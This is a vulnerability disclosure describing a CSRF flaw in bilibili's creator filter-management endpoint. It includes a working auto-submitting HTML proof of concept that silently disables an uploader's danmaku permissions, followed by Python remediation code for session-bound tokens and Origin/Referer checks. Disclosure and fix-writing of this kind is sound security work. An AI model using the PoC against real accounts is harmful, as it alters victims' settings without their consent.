Vulnerability details
This vulnerability can be used against an uploader (UP主): it turns off the three danmaku permissions listed below, so the videos they publish have no danmaku at all!
The CSRF is located in User Center --> Filter Management:
http://member.bilibili.com/#gl_manage
PoC
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CSRF/exploit--bilibili</title>
</head>
<body>
<!-- The save_filter endpoint accepts the form with only the victim's session cookie; no anti-CSRF token is required. -->
<form action="http://member.bilibili.com/video_manage.do?act=save_filter" method="POST">
<input type="hidden" name="format" value="json" />
<!-- The three danmaku permission settings, all set to 0 (off). -->
<input type="hidden" name="accept_guest" value="0" />
<input type="hidden" name="accept_spcmt" value="0" />
<input type="hidden" name="accept_advcmt" value="0" />
<input type="hidden" name="block_group" value="" />
<input type="hidden" name="new_filters" value="[]" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Fix
(1) Add an anti-CSRF token to the form and verify it server-side.
(2) Verify the Referer (and Origin) header.
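The following is an added example of how the two fixes above can be implemented on the server side; it is not code from the report or from bilibili. It assumes a server-side secret, a session id available to the request handler, and a hypothetical request dictionary shape; the sample requests are constructed to mirror the PoC form post (no token, foreign Referer) and a legitimate submission.

```python
import hashlib
import hmac
from typing import Optional
from urllib.parse import urlsplit

# Assumed server-side secret and the only host allowed to originate state-changing requests.
SERVER_SECRET = b"replace-with-a-random-server-secret"
ALLOWED_HOSTS = {"member.bilibili.com"}


def make_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Derive a per-session token as HMAC-SHA256(secret, session_id).

    Binding the token to the session means a page on another origin, which
    cannot read the victim's session, cannot compute a valid token, and the
    server needs no extra storage to verify it.
    """
    return hmac.new(secret, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, submitted: Optional[str], secret: bytes = SERVER_SECRET) -> bool:
    """Fix (1): constant-time comparison of the submitted token against the expected one."""
    if not submitted:
        return False
    return hmac.compare_digest(make_csrf_token(session_id, secret), submitted)


def check_source_header(headers: dict, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Fix (2): prefer Origin, fall back to Referer; reject when neither names an allowed host.

    Browsers set Origin/Referer on cross-site form posts and a page cannot
    forge them, so a POST from attacker.example is rejected here even before
    the token check. A missing header is treated as untrusted.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in ("origin", "referer"):
        value = lowered.get(name)
        if value:
            return urlsplit(value).hostname in allowed_hosts
    return False


def is_state_change_allowed(request: dict) -> bool:
    """Decision for a state-changing endpoint such as video_manage.do?act=save_filter."""
    if request["method"] != "POST":
        return False
    return check_source_header(request["headers"]) and verify_csrf_token(
        request["session_id"], request["form"].get("csrf_token")
    )


# Constructed sample requests (hypothetical session id and attacker host).
FILTER_FIELDS = {"format": "json", "accept_guest": "0", "accept_spcmt": "0",
                 "accept_advcmt": "0", "block_group": "", "new_filters": "[]"}

# What the PoC page produces: cookie-authenticated POST, foreign Referer, no token.
FORGED_REQUEST = {
    "method": "POST",
    "session_id": "sess-123",
    "headers": {"Referer": "http://attacker.example/csrf.html"},
    "form": dict(FILTER_FIELDS),
}

# A submission from the real Filter Management page carrying the rendered token.
LEGIT_REQUEST = {
    "method": "POST",
    "session_id": "sess-123",
    "headers": {"Origin": "http://member.bilibili.com",
                "Referer": "http://member.bilibili.com/#gl_manage"},
    "form": dict(FILTER_FIELDS, csrf_token=make_csrf_token("sess-123")),
}

# A token leaked or guessed for another session is rejected by the HMAC binding.
WRONG_SESSION_REQUEST = {
    "method": "POST",
    "session_id": "sess-123",
    "headers": {"Origin": "http://member.bilibili.com"},
    "form": dict(FILTER_FIELDS, csrf_token=make_csrf_token("sess-999")),
}

if __name__ == "__main__":
    print("forged allowed:", is_state_change_allowed(FORGED_REQUEST))
    print("legit allowed:", is_state_change_allowed(LEGIT_REQUEST))
    print("wrong-session allowed:", is_state_change_allowed(WRONG_SESSION_REQUEST))
```

Either check alone blocks the PoC; applying both means a future Referer-suppression trick (for example a privacy policy that strips the header) is still caught by the token, and a token that leaks through some other bug is still caught by the origin check.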